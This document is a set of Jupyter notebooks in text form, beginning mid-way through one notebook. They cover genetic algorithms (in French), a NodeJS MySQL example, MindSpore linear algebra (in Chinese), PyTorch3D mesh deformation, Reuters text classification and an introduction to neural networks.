des cas (bruteforce) de tous les messages à 12 (puis à 32) caractères possibles. # </div> 1.7e-6 * len(letters)**12 # en nombre d'années (âge de l'univers: 1.38e10) "12 letters: {:.3g} yr; 32 letters: {:.3g} yr".format( 1.7e-6 * len(letters)**12 / 365 / 24 / 60 / 60, 1.7e-6 * len(letters)**32 / 365 / 24 / 60 / 60) # ## Algorithmes # # <div class="alert alert-warning"> # **Théorie !** # </div> # # Voir les slides... # # <div class="alert alert-warning"> # **En pratique...** # </div> # # Toute la difficulté dans l'utilisation des algorithmes génétiques revient à correctement choisir un relativement grand nombre de paramètres: # # - comment choisir une taille de la population de départ ; # - comment initialiser la population de départ ; # - comment procéder aux croisements : # - comment choisir deux éléments à croiser (*la sélection*); # - comment croiser les éléments ; # - comment procéder aux mutations : # - quel taux de mutation choisir ; # - comment muter un élément ; # - comment arrêter la recherche : # - on peut fixer un nombre d'itérations maximal ; # - comment s'assurer qu'on conserve toujours la meilleure instance (*l'élitisme*) ; # - comment optimiser la convergence : # - la distribution (détails en annexe pour les personnes motivées/intéressées/en avance). # # <div class="alert alert-success"> # **Objectifs de la séance :** La suite de l'exercice consiste à coder des algorithmes génétiques en utilisant votre inspiration pour essayer différents opérateurs de sélection, de croisement et de mutation. # </div> # # Quelques remarques : # 1. **Nous sommes là pour vous guider**, pour vous suggérer des pistes d'amélioration, mais aussi pour vous laisser faire vos erreurs/comprendre par vous-même pourquoi une méthode n'est pas forcément pertinente; # 1. En paramétrant des méthodes stochastiques, on traverse en général une longue phase de « ça ne fonctionne pas » avant d'arriver aux bons paramètres qui permettent de résoudre le problème de manière efficace à tous les coups; # 1. Essayez de **garder une interface générique** pour vos fonctions afin de pouvoir facilement remplacer les opérateurs que vous testerez. # # <div class="alert alert-warning"> # **C'est à vous !** # </div> # + # Selection # Une seule méthode suffit ; le plus simple à expliquer est `tournament`. import bisect import itertools def tournament(samples, elite_size): for _ in samples[elite_size:]: yield max(random.sample(samples, 2)) def roulette(samples, elite_size): cumul_scores = list( itertools.accumulate(score for score, _ in samples)) total = cumul_scores[-1] for _ in samples[elite_size:]: yield samples[bisect.bisect(cumul_scores, random.uniform(0, total))] # + # Mask # Il faudrait présenter `two_point_crossover` (le classique) mais pour nous, # c'est finalement `uniform_point_crossover` qui fonctionne le mieux import itertools def one_point_crossover(length): point = random.randint(0, length) yield from itertools.repeat(True, point) yield from itertools.repeat(False, length - point) def two_point_crossover(length): point1, point2 = sorted(random.randint(0, length) for _ in range(2)) yield from itertools.repeat(True, point1) yield from itertools.repeat(False, point2 - point1) yield from itertools.repeat(True, length - point2) def uniform_point_crossover(length): return (random.choice((False, True)) for i in range(length)) # + # Combine # Une seule solution a priori, c'est `mask` qui fait tout le boulot) def combine(c1, c2, mask): for i1, i2, m in zip(c1[1], c2[1], mask): if m: yield i1, i2 else: yield i2, i1 # + # Mutate # Attention à mettre la proba de 5% sur une lettre et pas sur un mot pour avoir assez d'entropie def mutate(x): for i, _ in enumerate(x): if random.random() < .05: i = random.randint(0, 11) x[i] = random.choice(letters) return "".join(x) # + # New generation (unique solution) def pairwise(iterable): """Trick to get [(a, b), (c, d), ...] from [a, b, c, d, ...]""" x = iter(iterable) return zip(x, x) def new_generation(samples, length, mask, selection, elite_size): for x, y in pairwise(selection(samples, elite_size)): for t in zip(*combine(x, y, mask(length))): yield mutate(list(t)) # - def run(score, length, population=150, elite_size=2, mask=uniform_point_crossover, selection=tournament, iterations=200): # Initial population population = ["".join(random.choice(letters) for _ in range(length)) for i in range(population)] for i in range(iterations): # Evaluate a population scored_population = sorted(((score(i), i) for i in population), reverse=True) max_, best = scored_population[0] # Start a new generation with the elite population = [x[1] for x in scored_population[:elite_size]] if max_ == length: print() print("Found '{}' in {} iterations.".format(best, i)) break if i % 5 == 0: print("{} → {}".format(best, max_)) # Then add the crossover/mutation population += list(new_generation(scored_population, length, mask, selection, elite_size)) run(score_hello, 12) # <div class="alert alert-success"> # **Résolution :** Essayons maintenant avec la fonction reçue par notre ami ! # </div> # # Il faudra sans doute rejouer avec différents paramètres de l'algorithme pour trouver une solution... # # Dans le pire des cas, il faut garder à l'esprit la philosophie des méthodes stochastiques, à savoir « Mieux vaut une solution pas trop mauvaise que pas de solution ». # + # Il faut vraiment booster la population pour trouver la solution! # Sinon, il faudra faire le malin avec la méthode en annexe run(score, 32, population=700) # - # ## Annexe : calcul distribué, fonctionnement par îlots. # # Une manière de distribuer les calculs quand on est : # - un peu limite en ressource ; # - coincé dans des minima locaux ; # # consiste à lancer plusieurs exécutions du même algorithme en parallèle. Cette méthode permet également d'**avoir un comportement plus stable d'une exécution à l'autre**. # # Chaque algorithme va alors converger vers différents minima locaux. Le principe des îlots consiste alors à faire voyager les meilleurs éléments de chaque îlot vers les îlots voisins afin qu'ils se croisent avec d'autres populations. Il faut alors trouver un rythme de *voyage* qui permette à chaque îlot de développer des spécificités tout en brassant suffisamment souvent pour aider à la convergence. # # Nous vous proposons alors le code suivant à base de threads (module `concurrent.futures`) et avec des queues (thread-safe!) pour communiquer. Les particularités du langage Python (rechercher "Global Interpreter Lock" (GIL) pour plus de détails...) ne permettent pas de procéder à un vrai multithreading donc la méthode serait à vrai dire plus efficace dans un autre langage de programmation. def run_islands(idx, length=32, population=400, elite_size=2, mask=uniform_point_crossover, selection=tournament, iterations=200): # Initial population population = ["".join(random.choice(letters) for _ in range(length)) for i in range(population)] for i in range(iterations): # Evaluation a population scored_population = sorted(((score(i), i) for i in population), reverse=True) max_, best = scored_population[0] # Start a new generation with the elite population = [x[1] for x in scored_population[:elite_size]] if max_ == length: return (best, i) if i % 5 == 0: # astuce du \n pour éviter deux threads qui écrivent sur la même ligne print("Island {} : {} → {}\n".format(idx, best, max_), end="", flush=True) # Pass to next island queues[(idx + 1) % n_islands].put(population) try: # Get from previous island population += queues[idx].get(block=True, timeout=5) queues[idx].task_done() except queue.Empty: return (None, i) # Then add the crossover/mutation population += list(new_generation(scored_population, length, mask, selection, 2*elite_size)) return (None, i) # + from concurrent import futures import queue n_islands = 3 # Attention à bien recréer des queues de communications vides ! queues = [queue.Queue() for _ in range(n_islands)] executor = futures.ThreadPoolExecutor(max_workers = n_islands) results = executor.map(run_islands, range(n_islands)) best = None total_it = 0 for i, r in enumerate(results): best_i, it = r if best_i is not None: best = best_i print("Found '{}' in {} iterations on island {}".format(best_i, it, i)) total_it += it # -
notebooks/solutions/02-genetic_algorithms.ipynb
// --- // jupyter: // jupytext: // text_representation: // extension: .js // format_name: light // format_version: '1.5' // jupytext_version: 1.14.4 // kernelspec: // display_name: NodeJS // language: javascript // name: nodejs // --- // #MySQL var mysql = require('mysql'); var connection = mysql.createConnection({ host : 'localhost', user : 'tester', password : '<PASSWORD>', }); connection.connect(function(err) { // connected! (unless `err` is set) if (err) throw err; console.log('connected as id ' + connection.threadId); }); // Let's insert some data var post ={first_name:'Wolfgang', last_name:'Goethe', year_of_death:'1832-01-01 00:00'} var query = connection.query('INSERT INTO `test_db`.`writer` SET ?', post, function(err, result) { if (err) throw err; console.log(result.insertId); }); console.log(query.sql) // Let's query for some data, prepared statement // + var sql = "SELECT * FROM ?? WHERE ?? > ?"; var inserts = ['test_db.writer', 'year_of_death', '1500']; sql = mysql.format(sql, inserts); var query = connection.query(sql, function(err, results) { if (err) throw err; for (var i = 0; i < results.length; i++) { console.log('Writer: ', results[i].first_name , results[i].last_name, "Year of Death: ", results[i].year_of_death); } }); // -
examples_database/test_database_NodeJS.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # + [markdown] slideshow={"slide_type": "-"} # # 线性代数 # # 标量由只有一个元素的张量表示 # + origin_pos=2 tab=["pytorch"] import mindspore import mindspore.numpy as mnp x = mindspore.Tensor(3.0, dtype=mindspore.float32) y = mindspore.Tensor(2.0, dtype=mindspore.float32) x + y, x * y, x / y, x**y # + [markdown] slideshow={"slide_type": "slide"} # 你可以将向量视为标量值组成的列表 # + origin_pos=6 tab=["pytorch"] x = mnp.arange(4) x # + [markdown] slideshow={"slide_type": "-"} # 通过张量的索引来访问任一元素 # + origin_pos=10 tab=["pytorch"] x[3] # + [markdown] slideshow={"slide_type": "slide"} # 访问张量的长度 # + origin_pos=14 tab=["pytorch"] len(x) # + [markdown] slideshow={"slide_type": "-"} # 只有一个轴的张量,形状只有一个元素 # + origin_pos=18 tab=["pytorch"] x.shape # + [markdown] slideshow={"slide_type": "slide"} # 通过指定两个分量$m$和$n$来创建一个形状为$m \times n$的矩阵 # + origin_pos=22 tab=["pytorch"] A = mnp.arange(20).reshape(5, 4) A # + [markdown] slideshow={"slide_type": "-"} # 矩阵的转置 # + origin_pos=26 tab=["pytorch"] A.T # + [markdown] slideshow={"slide_type": "slide"} # *对称矩阵*(symmetric matrix)$\mathbf{A}$等于其转置:$\mathbf{A} = \mathbf{A}^\top$ # + origin_pos=30 tab=["pytorch"] B = mindspore.Tensor([[1, 2, 3], [2, 0, 4], [3, 4, 5]], dtype=mindspore.int32) B # + origin_pos=34 tab=["pytorch"] B == B.T # + [markdown] slideshow={"slide_type": "slide"} # 就像向量是标量的推广,矩阵是向量的推广一样,我们可以构建具有更多轴的数据结构 # + origin_pos=38 tab=["pytorch"] X = mnp.arange(24).reshape(2, 3, 4) X # + [markdown] slideshow={"slide_type": "slide"} # 给定具有相同形状的任意两个张量,任何按元素二元运算的结果都将是相同形状的张量 # + origin_pos=42 tab=["pytorch"] A = mnp.arange(20, dtype=mindspore.float32).reshape(5, 4) B = A.copy() A, A + B # + [markdown] slideshow={"slide_type": "slide"} # 两个矩阵的按元素乘法称为*Hadamard积*(Hadamard product)(数学符号$\odot$) # + origin_pos=46 tab=["pytorch"] A * B # + origin_pos=50 tab=["pytorch"] a = 2 X = mnp.arange(24).reshape(2, 3, 4) a + X, (a * X).shape # + [markdown] slideshow={"slide_type": "slide"} # 计算其元素的和 # + origin_pos=54 tab=["pytorch"] x = mnp.arange(4, dtype=mindspore.float32) x, x.sum() # + [markdown] slideshow={"slide_type": "-"} # 表示任意形状张量的元素和 # + origin_pos=58 tab=["pytorch"] A.shape, A.sum() # + [markdown] slideshow={"slide_type": "slide"} # 指定张量沿哪一个轴来通过求和降低维度 # + origin_pos=62 tab=["pytorch"] A_sum_axis0 = A.sum(axis=0) A_sum_axis0, A_sum_axis0.shape # + origin_pos=66 tab=["pytorch"] A_sum_axis1 = A.sum(axis=1) A_sum_axis1, A_sum_axis1.shape # + origin_pos=70 tab=["pytorch"] A.sum(axis=(0, 1)) # + [markdown] slideshow={"slide_type": "slide"} # 一个与求和相关的量是*平均值*(mean或average) # + origin_pos=74 tab=["pytorch"] A.mean(), A.sum() / A.size # + origin_pos=78 tab=["pytorch"] A.mean(axis=0), A.sum(axis=0) / A.shape[0] # + [markdown] slideshow={"slide_type": "slide"} # 计算总和或均值时保持轴数不变 # + origin_pos=82 tab=["pytorch"] sum_A = A.sum(axis=1, keepdims=True) sum_A # + [markdown] slideshow={"slide_type": "-"} # 通过广播将`A`除以`sum_A` # + origin_pos=86 tab=["pytorch"] A / sum_A # + [markdown] slideshow={"slide_type": "slide"} # 某个轴计算`A`元素的累积总和 # + origin_pos=90 tab=["pytorch"] A.cumsum(axis=0) # + [markdown] slideshow={"slide_type": "slide"} # 点积是相同位置的按元素乘积的和 # + origin_pos=94 tab=["pytorch"] y = mnp.ones(4, dtype = mindspore.float32) x, y, mnp.dot(x, y) # + [markdown] slideshow={"slide_type": "-"} # 我们可以通过执行按元素乘法,然后进行求和来表示两个向量的点积 # + origin_pos=98 tab=["pytorch"] mnp.sum(x * y) # + [markdown] slideshow={"slide_type": "slide"} # 矩阵向量积$\mathbf{A}\mathbf{x}$是一个长度为$m$的列向量, # 其第$i$个元素是点积$\mathbf{a}^\top_i \mathbf{x}$ # + origin_pos=105 tab=["pytorch"] A.shape, x.shape, mnp.dot(A, x) # + [markdown] slideshow={"slide_type": "slide"} # 我们可以将矩阵-矩阵乘法$\mathbf{AB}$看作是简单地执行$m$次矩阵-向量积,并将结果拼接在一起,形成一个$n \times m$矩阵 # + origin_pos=109 tab=["pytorch"] B = mnp.ones((4, 3)) mnp.matmul(A, B) # + [markdown] slideshow={"slide_type": "slide"} # $L_2$*范数*是向量元素平方和的平方根: # $$\|\mathbf{x}\|_2 = \sqrt{\sum_{i=1}^n x_i^2}$$ # + origin_pos=113 tab=["pytorch"] u = mindspore.Tensor([3.0, -4.0], dtype=mindspore.float32) mnp.norm(u) # + [markdown] slideshow={"slide_type": "slide"} # $L_1$范数,它表示为向量元素的绝对值之和: # $$\|\mathbf{x}\|_1 = \sum_{i=1}^n \left|x_i \right|$$ # + origin_pos=117 tab=["pytorch"] mnp.abs(u).sum() # + [markdown] slideshow={"slide_type": "slide"} # 矩阵 # 的*Frobenius范数*(Frobenius norm)是矩阵元素平方和的平方根: # $$\|\mathbf{X}\|_F = \sqrt{\sum_{i=1}^m \sum_{j=1}^n x_{ij}^2}$$ # + origin_pos=121 tab=["pytorch"] mnp.norm(mnp.ones((4, 9)))
chapter_02_preliminaries/2_linear-algebra.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + colab={} colab_type="code" id="nF07sDgJWHQy" # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved. # + [markdown] colab_type="text" id="BRcOouCyWHQ2" # # Deform a source mesh to form a target mesh using 3D loss functions # + [markdown] colab_type="text" id="HfwwW9HqtuvQ" # In this tutorial, we learn to deform an initial generic shape (e.g. sphere) to fit a target shape. # # We will cover: # # - How to **load a mesh** from an `.obj` file # - How to use the PyTorch3D **Meshes** datastructure # - How to use 4 different PyTorch3D **mesh loss functions** # - How to set up an **optimization loop** # # # Starting from a sphere mesh, we learn the offset to each vertex in the mesh such that # the predicted mesh is closer to the target mesh at each optimization step. To achieve this we minimize: # # # + `chamfer_distance`, the distance between the predicted (deformed) and target mesh, defined as the chamfer distance between the set of pointclouds resulting from **differentiably sampling points** from their surfaces. # # However, solely minimizing the chamfer distance between the predicted and the target mesh will lead to a non-smooth shape (verify this by setting `w_chamfer=1.0` and all other weights to `0.0`). # # We enforce smoothness by adding **shape regularizers** to the objective. Namely, we add: # # # + `mesh_edge_length`, which minimizes the length of the edges in the predicted mesh. # # + `mesh_normal_consistency`, which enforces consistency across the normals of neighboring faces. # # + `mesh_laplacian_smoothing`, which is the laplacian regularizer. # + [markdown] colab_type="text" id="P-h1ji4dWHQ5" # ## 0. Install and Import modules # - # If `torch`, `torchvision` and `pytorch3d` are not installed, run the following cell: # + colab={} colab_type="code" id="_qkuyhyTeRyM" # !pip install torch torchvision # !pip install 'git+https://github.com/facebookresearch/pytorch3d.git@stable' # + colab={} colab_type="code" id="ylbZGXYBtuvB" import os import torch from pytorch3d.io import load_obj, save_obj from pytorch3d.structures import Meshes from pytorch3d.utils import ico_sphere from pytorch3d.ops import sample_points_from_meshes from pytorch3d.loss import ( chamfer_distance, mesh_edge_loss, mesh_laplacian_smoothing, mesh_normal_consistency, ) import numpy as np from tqdm import tqdm_notebook # %matplotlib notebook from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt import matplotlib as mpl mpl.rcParams['savefig.dpi'] = 80 mpl.rcParams['figure.dpi'] = 80 # Set the device device = torch.device("cuda:0") # + [markdown] colab_type="text" id="yT1JTXu1WHQ_" # ## 1. Load an obj file and create a Meshes object # - # Download the target 3D model of a dolphin. It will be saved locally as a file called `dolphin.obj`. # + colab={"base_uri": "https://localhost:8080/", "height": 204} colab_type="code" id="oFNkB6nQWZSw" outputId="c1bbe6e2-a4ea-4113-d53d-1cb1ece130f1" # !wget https://dl.fbaipublicfiles.com/pytorch3d/data/dolphin/dolphin.obj # + colab={} colab_type="code" id="dz0imH-ltuvS" # Load the dolphin mesh. trg_obj = os.path.join('dolphin.obj') # + colab={} colab_type="code" id="rbyRhI8ituvW" # We read the target 3D model using load_obj verts, faces, aux = load_obj(trg_obj) # verts is a FloatTensor of shape (V, 3) where V is the number of vertices in the mesh # faces is an object which contains the following LongTensors: verts_idx, normals_idx and textures_idx # For this tutorial, normals and textures are ignored. faces_idx = faces.verts_idx.to(device) verts = verts.to(device) # We scale normalize and center the target mesh to fit in a sphere of radius 1 centered at (0,0,0). # (scale, center) will be used to bring the predicted mesh to its original center and scale # Note that normalizing the target mesh, speeds up the optimization but is not necessary! center = verts.mean(0) verts = verts - center scale = max(verts.abs().max(0)[0]) verts = verts / scale # We construct a Meshes structure for the target mesh trg_mesh = Meshes(verts=[verts], faces=[faces_idx]) # + colab={} colab_type="code" id="6BxDTpB2WHRH" # We initialize the source shape to be a sphere of radius 1 src_mesh = ico_sphere(4, device) # + [markdown] colab_type="text" id="dYWDl4VGWHRK" # ### Visualize the source and target meshes # + colab={} colab_type="code" id="482YycLHWHRL" def plot_pointcloud(mesh, title=""): # Sample points uniformly from the surface of the mesh. points = sample_points_from_meshes(mesh, 5000) x, y, z = points.clone().detach().cpu().squeeze().unbind(1) fig = plt.figure(figsize=(5, 5)) ax = Axes3D(fig) ax.scatter3D(x, z, -y) ax.set_xlabel('x') ax.set_ylabel('z') ax.set_zlabel('y') ax.set_title(title) ax.view_init(190, 30) plt.show() # + colab={"base_uri": "https://localhost:8080/", "height": 765} colab_type="code" id="UoGcflJ_WHRO" outputId="b9a2d699-2c68-4696-9dff-d30eea7a0fb0" # # %matplotlib notebook plot_pointcloud(trg_mesh, "Target mesh") plot_pointcloud(src_mesh, "Source mesh") # + [markdown] colab_type="text" id="8uzMiTUSWHRS" # ## 3. Optimization loop # + colab={} colab_type="code" id="Sc-3M17Ltuvh" # We will learn to deform the source mesh by offsetting its vertices # The shape of the deform parameters is equal to the total number of vertices in src_mesh deform_verts = torch.full(src_mesh.verts_packed().shape, 0.0, device=device, requires_grad=True) # + colab={} colab_type="code" id="0BtSUfMYtuvl" # The optimizer optimizer = torch.optim.SGD([deform_verts], lr=1.0, momentum=0.9) # + colab={"base_uri": "https://localhost:8080/", "height": 1000, "referenced_widgets": ["12fdcbc799cc4da899d889d0399616c2", "0bd231c2134e4127a3756807317d6aae", "<KEY>", "be25dd06faf04bf29733cc16deefb189", "283601ac2fe54ecc8716aed8842a5dd2", "6e2ff75105a74afbb4ed3fafd414e16f", "5462de8f68be408d98a6a495e630f448", "<KEY>"]} colab_type="code" id="9DAjqI9Atuvp" outputId="d59e959b-8616-40fe-aec4-5b09b27e325f" # Number of optimization steps Niter = 2000 # Weight for the chamfer loss w_chamfer = 1.0 # Weight for mesh edge loss w_edge = 1.0 # Weight for mesh normal consistency w_normal = 0.01 # Weight for mesh laplacian smoothing w_laplacian = 0.1 # Plot period for the losses plot_period = 250 loop = tqdm_notebook(range(Niter)) chamfer_losses = [] laplacian_losses = [] edge_losses = [] normal_losses = [] # %matplotlib inline for i in loop: # Initialize optimizer optimizer.zero_grad() # Deform the mesh new_src_mesh = src_mesh.offset_verts(deform_verts) # We sample 5k points from the surface of each mesh sample_trg = sample_points_from_meshes(trg_mesh, 5000) sample_src = sample_points_from_meshes(new_src_mesh, 5000) # We compare the two sets of pointclouds by computing (a) the chamfer loss loss_chamfer, _ = chamfer_distance(sample_trg, sample_src) # and (b) the edge length of the predicted mesh loss_edge = mesh_edge_loss(new_src_mesh) # mesh normal consistency loss_normal = mesh_normal_consistency(new_src_mesh) # mesh laplacian smoothing loss_laplacian = mesh_laplacian_smoothing(new_src_mesh, method="uniform") # Weighted sum of the losses loss = loss_chamfer * w_chamfer + loss_edge * w_edge + loss_normal * w_normal + loss_laplacian * w_laplacian # Print the losses loop.set_description('total_loss = %.6f' % loss) # Save the losses for plotting chamfer_losses.append(loss_chamfer) edge_losses.append(loss_edge) normal_losses.append(loss_normal) laplacian_losses.append(loss_laplacian) # Plot mesh if i % plot_period == 0: plot_pointcloud(new_src_mesh, title="iter: %d" % i) # Optimization step loss.backward() optimizer.step() # + [markdown] colab_type="text" id="VGcZsvWBWHRc" # ## 4. Visualize the loss # + colab={"base_uri": "https://localhost:8080/", "height": 374} colab_type="code" id="baXvAo1yWHRd" outputId="11ebe2ad-4352-4492-bd67-e6a3c95adc85" fig = plt.figure(figsize=(13, 5)) ax = fig.gca() ax.plot(chamfer_losses, label="chamfer loss") ax.plot(edge_losses, label="edge loss") ax.plot(normal_losses, label="normal loss") ax.plot(laplacian_losses, label="laplacian loss") ax.legend(fontsize="16") ax.set_xlabel("Iteration", fontsize="16") ax.set_ylabel("Loss", fontsize="16") ax.set_title("Loss vs iterations", fontsize="16") # + [markdown] colab_type="text" id="Y9vSKErDWHRg" # ## 5. Save the predicted mesh # + colab={} colab_type="code" id="krikJzrLtuvw" # Fetch the verts and faces of the final predicted mesh final_verts, final_faces = new_src_mesh.get_mesh_verts_faces(0) # Scale normalize back to the original target size final_verts = final_verts * scale + center # Store the predicted mesh using save_obj final_obj = os.path.join('./', 'final_model.obj') save_obj(final_obj, final_verts, final_faces) # + [markdown] colab_type="text" id="quR1DVAcWHRk" # ## 6. Conclusion # # In this tutorial we learnt how to load a mesh from an obj file, initialize a PyTorch3D datastructure called **Meshes**, set up an optimization loop and use four different PyTorch3D mesh loss functions.
docs/tutorials/deform_source_mesh_to_target_mesh.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # %config InlineBackend.figure_format = 'retina' # + # %load_ext autoreload # %autoreload 1 # + import numpy as np import pandas as pd import pickle from pathlib import Path # - # # Load data # + data_root = Path.home() / "data" / "tmp" reuters_dir = data_root / "reuters21578" reuters_corpus_path = reuters_dir / "corpus.pkl" reuters = pickle.load(open(reuters_corpus_path, "rb")) top_ten_ids, top_ten_names = reuters.top_n(n=10) cache_dir = reuters_dir / "cache" # - # # Build dataframe train_docs, test_docs = reuters.split_modapte() docs = train_docs + test_docs train_labels = reuters.get_labels(train_docs, set(top_ten_ids)) test_labels = reuters.get_labels(test_docs, set(top_ten_ids)) from ds_tutorial.datasets import build_reuters_dataframe df, top_ten_ids, train_labels, test_labels = build_reuters_dataframe( docs, reuters.topics, train_labels, test_labels, top_ten_ids) df.head() # # Build feature extraction pipeline # + from sklearn.pipeline import Pipeline from sklearn.pipeline import FeatureUnion from sklearn.preprocessing import Imputer from sklearn.preprocessing import StandardScaler from sklearn.decomposition import TruncatedSVD from sklearn.metrics import classification_report from sklearn.feature_extraction import DictVectorizer from sklearn.base import BaseEstimator, TransformerMixin from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.svm import LinearSVC # - from ds_tutorial.transformers import TextFromColumns, TextStats, ColumnSelector, TextFromColumns2 df_train = df.query("modapte == 'train'") df_test = df.query("modapte == 'test'") y_train = df_train.label.values y_test = df_test.label.values pipeline = Pipeline(memory=str(cache_dir), steps=[ ("union", FeatureUnion(transformer_list=[ ("title_stats", Pipeline([ ("column", ColumnSelector("title")), ("stats", TextStats()), ("scaled", StandardScaler()), ])), ("body_stats", Pipeline([ ("column", ColumnSelector("body")), ("stats", TextStats()), ("scaled", StandardScaler()), ])), ("combined_text", Pipeline([ ("column", TextFromColumns(columns=["title", "body"])), #("tfidf", TfidfVectorizer(analyzer="char_wb", ngram_range=(1, 5))), ("tfidf", TfidfVectorizer()), #("best", TruncatedSVD(n_components=300, random_state=2018)) ])), ])), ]) X_train = pipeline.fit_transform(df_train) X_test = pipeline.transform(df_test) # ## Build multi layer perceptron from tensorflow.python.keras.optimizers import Adam from tensorflow.python.keras import models from tensorflow.python.keras.layers import Dense from tensorflow.python.keras.layers import Dropout def mlp_model(layers, units, dropout_rate, input_shape, num_classes): model = models.Sequential() model.add(Dropout(rate=dropout_rate, input_shape=input_shape)) for _ in range(layers-1): model.add(Dense(units=units, activation='relu')) model.add(Dropout(rate=dropout_rate)) model.add(Dense(units=num_classes, activation="softmax")) return model model = mlp_model(3, 32, 0.2, X_train.shape[1:], 75) optimizer = Adam(lr=1e-3) model.compile(optimizer=optimizer, loss="sparse_categorical_crossentropy", metrics=['acc']) history = model.fit(X_train, y_train, epochs=15) y_pred = model.predict_classes(X_test) print(classification_report(y_test, y_pred, target_names=top_ten_names, labels=top_ten_ids, digits=3)) y_pred = model.predict_classes(X_test) print(classification_report(y_test, y_pred, target_names=top_ten_names, labels=top_ten_ids, digits=3)) y_pred = model.predict_classes(X_test) print(classification_report(y_test, y_pred, target_names=top_ten_names, labels=top_ten_ids, digits=3)) # %%time model = LinearSVC() model.fit(X_train, y_train) y_pred = model.predict(X_test) print(classification_report(y_test, y_pred, target_names=top_ten_names, labels=top_ten_ids, digits=3))
notebooks/text_classification/mlp.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Machine Learning and Statistics for Physicists # Material for a [UC Irvine](https://uci.edu/) course offered by the [Department of Physics and Astronomy](https://www.physics.uci.edu/). # # Content is maintained on [github](github.com/dkirkby/MachineLearningStatistics) and distributed under a [BSD3 license](https://opensource.org/licenses/BSD-3-Clause). # # [Table of contents](Contents.ipynb) # %matplotlib inline import matplotlib.pyplot as plt import seaborn as sns; sns.set() import numpy as np import pandas as pd from mls import nn_unit_draw2d, nn_graph_draw2d import torch.nn import mls.torch # ## Neural Networks # From a user's perspective, a neural network (NN) is a class of models $X_\text{out} = N(X_\text{in}; \Theta)$ that are: # - **Generic:** they are not tailored to any particular application. # - **Flexible:** they can accurately represent a wide range of non-linear $X_\text{in}\rightarrow X_\text{out}$ mappings with a suitable choice of parameters $\Theta$. # - **Trainable:** a robust optimization algorithm (backpropagation) can learn parameters $\Theta$ given enough training data $D = (X_\text{in},Y_\text{tgt})$. # - **Modular:** it is straightforward to scale the model complexity (and number of parameters) to match the available training data. # - **Efficient:** most of the internal computations are linear and amenable to parallel computation and hardware acceleration. # # The "neural" aspect of a NN is tenuous. Their design mimics some aspects of biological neurons, but also differs in fundamental ways. # # In this notebook, we will explore NNs from several different perspectives: # - **Mathematical:** What equations describe a network? # - **Visual:** What does the network graph look like? How is the input space mapped through the network? # - **Data Flow:** What are the tensors that parameterize and flow (forwards and backwards) through a network? # - **Statistical:** What are typical distributions of tensor values? # ### Mathematical Perspective # #### Building Block # # The internal structure of a NN is naturally described by a computation graph that connects simple building blocks. The basic building-block unit is a function of $D$ input features $x_i$, # $$ # f(\mathbf{x}) = \phi\left(\mathbf{x}\cdot\mathbf{w} + b\right) # $$ # with $D+1$ parameters consisting of $D$ **weights** $w_i$ and a single **bias** $b$. The corresponding [graph](http://alexlenail.me/NN-SVG/index.html) (with $D=8$) is: # # ![NN unit](img/NeuralNetworks/nn_unit.png) # # where the left nodes correspond to the elements of the input $\mathbf{x}$, the edges correspond to the elements of $\mathbf{w}$ (thickness ~ strength, red/blue are pos/neg values), and the right node is the output value $f(\mathbf{x})$. The recipe for obtaining the output value is then: # - propagate each input value $x_i$ with a strength $w_i$, # - sum the values $x_i w_i$, # - apply the activation $\phi$. # # Note that this building block is mostly linear, except for the **activation function** $\phi(s)$. This is an application of the kernel trick covered in the [Nonlinear notebook](Nonlinear.ipynb), and allows us to implicitly work in a higher dimensional space where non-linear structure in data is easier to model. # # The building-block equation is straightfoward to implement as code: def nn_unit(x, w, b, phi): return phi(np.dot(x, w) + b) # For example, with a 3D input $\mathbf{x}$, the weight vector $\mathbf{w}$ should also be 3D: nn_unit(x=[0, 1, -1], w=[1, 2, 3], b=-1, phi=np.tanh) # #### Activation Functions # # The activation function $\phi$ argument $s$ is always a scalar and, by convention, activation functions are always defined in a standard form, without any parameters (since $\mathbf{w}$ and $b$ already provide enough learning flexibility). # # Some popular activations are defined below (using [lambda functions](https://docs.python.org/3/tutorial/controlflow.html#lambda-expressions)). For the full list supported in PyTorch see [here](https://pytorch.org/docs/stable/nn.html#non-linear-activations-weighted-sum-nonlinearity). relu = lambda s: np.maximum(0, s) elu = lambda s: np.maximum(0, s) + np.minimum(0, np.expm1(s)) # expm1(s) = exp(s) - 1 softplus = lambda s: np.log(1 + np.exp(s)) sigmoid = lambda s: 1 / (1 + np.exp(-s)) # also known as the "logistic function" tanh = lambda s: np.tanh(s) softsign = lambda s: s / (np.abs(s) + 1) # These activations divide naturally into two categories depending on their asymptotic behavior as $s\rightarrow +\infty$: # + def plot_activations(ax, names, s_range=5, y_range=2): s = np.linspace(-s_range, +s_range, 101) for name in names.split(','): phi = eval(name) ax.plot(s, phi(s), lw=4, alpha=0.5, label=name) ax.legend(fontsize='x-large') ax.set_xlabel('Activation input $s$') ax.set_ylabel('Activation output $\phi(s)$') ax.set_xlim(-s_range, +s_range) ax.set_ylim(-y_range, +y_range) ax.axhline(-1, c='gray', ls=':') ax.axhline(+1, c='gray', ls=':') _, ax = plt.subplots(1, 2, figsize=(12, 5)) plot_activations(ax[0], 'relu,elu,softplus') plot_activations(ax[1], 'sigmoid,tanh,softsign') plt.tight_layout() # - # Note that all activations saturate (at -1 or 0) for $s\rightarrow -\infty$, but differ in their behavior when $s\rightarrow +\infty$ (linear vs saturate at +1). # + [markdown] solution2="hidden" solution2_first=true # **DISCUSS:** # - Which activation would you expect to be the fastest to compute? # - Which activations are better suited for a binary classification problem? # + [markdown] solution2="hidden" # The `relu` activation is the fastest to compute since it does not involve any transcendental function calls (exp, log, ...). # # The activations that are bounded on both sides only have a narrow range near $s=0$ where they distinguish between different input values, and otherwise are essentially saturated at one of two values. This is desirable for classification, where the aim is to place $s=0$ close to the "decision boundary" (by learning a suitable bias). # # --- # - # 